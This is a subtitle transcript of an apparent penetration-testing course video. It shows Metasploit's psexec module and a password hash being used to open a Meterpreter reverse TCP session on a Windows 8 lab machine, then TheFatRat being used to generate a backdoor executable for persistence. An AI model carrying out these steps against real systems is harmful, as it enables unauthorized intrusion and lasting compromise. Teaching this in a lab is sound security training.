1
00:00:00,460 --> 00:00:06,340
So let's try another method for persistence, which is not deprecated yet.

2
00:00:07,820 --> 00:00:13,940
So if you can recall, when we run the Meterpreter persistence module, it says that the Meterpreter

3
00:00:13,940 --> 00:00:21,860
scripts are deprecated and suggests to us to try the post/windows/manage/persistence_exe module.

4
00:00:23,280 --> 00:00:30,030
And when we look at the options of the persistence module, we see that we need to have two things.

5
00:00:30,030 --> 00:00:32,770
First, we need a session to run a session on.

6
00:00:33,200 --> 00:00:37,890
Second, we need to have an executable to use as the backdoor binary.

7
00:00:38,430 --> 00:00:44,250
And that means it's our responsibility to find or create a backdoor to use with this module.

8
00:00:45,420 --> 00:00:47,360
So let's create a session first.

9
00:00:47,670 --> 00:00:52,350
This is the victim machine, Windows 8, with the IP address to two three.

10
00:00:53,480 --> 00:01:01,070
Now, I want to be sure that Windows Defender is up and running, so writing defender in the start menu,

11
00:01:01,400 --> 00:01:07,850
here is the Windows Defender and yup, it's running and the real-time protection is on.

12
00:01:08,960 --> 00:01:14,270
So go back to Kali, open a terminal window and run msfconsole.

13
00:01:20,340 --> 00:01:27,390
And here I'll use again the PsExec module to create a Meterpreter session on the Windows 8 victim

14
00:01:27,400 --> 00:01:27,840
system.

15
00:01:28,900 --> 00:01:32,950
So use exploit/windows/smb/psexec.

16
00:01:33,840 --> 00:01:38,390
Set the payload to windows/meterpreter/reverse_tcp.

17
00:01:39,510 --> 00:01:46,020
Now is the time to set the options, Kali as our host, Windows 8 as Ellos.

18
00:01:47,550 --> 00:01:48,660
User is admin.

19
00:01:49,700 --> 00:01:53,180
The password hash was in the file on the desktop.

20
00:01:59,080 --> 00:02:01,750
Now we are ready to run the exploit.

21
00:02:03,050 --> 00:02:07,880
Yep, look at that, we have a Meterpreter session on Windows 8, system two to three.

22
00:02:09,410 --> 00:02:12,800
So we opened the session and now we need a backdoor.

23
00:02:14,870 --> 00:02:20,900
I'm going to use TheFatRat tool to create the malware that sounds like it worked on in.

24
00:02:22,200 --> 00:02:28,920
Well, you're right, TheFatRat is a powerful and easy-to-use exploitation tool that can help you

25
00:02:28,920 --> 00:02:34,790
to generate backdoors and post-exploitation attacks like browser attack, DLL files.

26
00:02:35,430 --> 00:02:41,850
This tool compiles malware with popular payloads, and then the compiled malware can be executed on

27
00:02:41,850 --> 00:02:44,550
Windows, Linux, Mac OS X and Android.

28
00:02:46,420 --> 00:02:52,450
Now, since it's not the subject of the course, I'm not going to go in too deep with TheFatRat,

29
00:02:53,230 --> 00:02:55,920
I'll just quickly use it just to give you an idea.

30
00:02:57,580 --> 00:03:03,640
To have detailed information about creating undetectable, malicious software, please, I'll refer

31
00:03:03,640 --> 00:03:07,660
you to the social engineering and malware for hacking course.

32
00:03:09,570 --> 00:03:14,700
So when we run TheFatRat, it first checks if dependent applications are ready.

33
00:03:21,690 --> 00:03:26,760
Now, a warning about not to upload the created malware to VirusTotal.

34
00:03:28,170 --> 00:03:34,170
Then it starts PostgreSQL as well, and finally, we're on the main menu of TheFatRat.

35
00:03:35,440 --> 00:03:39,420
I'll type six to use the sixth option to create a backdoor.

36
00:03:39,960 --> 00:03:42,270
Now we are in the PwnWinds menu.

37
00:03:42,750 --> 00:03:44,160
Choose the fourth option here.

38
00:03:46,040 --> 00:03:52,190
Now is the time to set the options: LHOST is Kali, I'll choose 4321 for the

39
00:03:52,190 --> 00:03:55,040
LPORT and that doesn't have a special meaning.

40
00:03:55,040 --> 00:03:58,190
You can choose any port which is not in use at the moment.

41
00:03:59,120 --> 00:04:02,090
Choose a base name for the file that will be produced.

42
00:04:02,100 --> 00:04:04,640
I'll choose my pretty backdoor.

43
00:04:06,820 --> 00:04:13,120
Now it asks for the payload now and I choose three, Meterpreter reverse TCP.

44
00:04:15,190 --> 00:04:21,640
I start to generate the backdoor and a few seconds later, the backdoor file is saved to the output folder.

45
00:04:23,820 --> 00:04:29,820
Well, I'll open another terminal screen to look at the output folder and go to the output folder under

46
00:04:29,820 --> 00:04:33,000
TheFatRat using the cd command, of course.

47
00:04:34,960 --> 00:04:39,880
And there it is, my pretty backdoor is right here where I wanted it to be.

